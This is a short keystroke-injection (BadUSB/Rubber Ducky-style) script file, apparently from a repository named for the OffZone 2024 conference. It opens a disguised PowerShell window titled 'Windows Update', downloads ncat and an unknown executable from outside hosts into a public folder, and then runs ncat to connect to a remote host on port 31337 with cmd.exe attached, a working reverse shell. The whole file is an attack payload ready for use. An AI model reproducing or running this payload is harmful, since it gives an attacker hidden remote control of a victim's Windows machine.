offzone24/WIN10-NC-Rev-Shell.txt

30 lines
770 B
Plaintext
Raw Normal View History

2024-08-22 10:08:38 +03:00
GUI R
DELAY 2000
STRING PowerShell.exe -noe -c "mode.com con: lines=1 cols=12"
ENTER
DELAY 2000
STRING $Host.UI.RawUI.WindowTitle = "Windows Update"
DELAY 2000
ENTER
DELAY 2000
STRING mkdir C:\Users\Public\Documents\she
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri https://nmap.org/dist/nmap-7.80-win32.zip -Outfile C:\Users\Public\Documents\she\nc.zip
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri http://pwnpalace.com/download/others/fce642c6-1963-4a0d-bffe-173f43f02329.zip -Outfile C:\Users\Public\Documents\she\unzip.exe
ENTER
DELAY 2000
STRING cd C:\Users\Public\Documents\she
ENTER
DELAY 2000
STRING .\unzip.exe nc.zip
ENTER
DELAY 3000
STRING cd nmap-7.80
ENTER
DELAY 2000
2024-08-22 10:38:19 +03:00
STRING .\ncat.exe spve.lessmore.pw 31337 -e cmd.exe
2024-08-22 10:08:38 +03:00
ENTER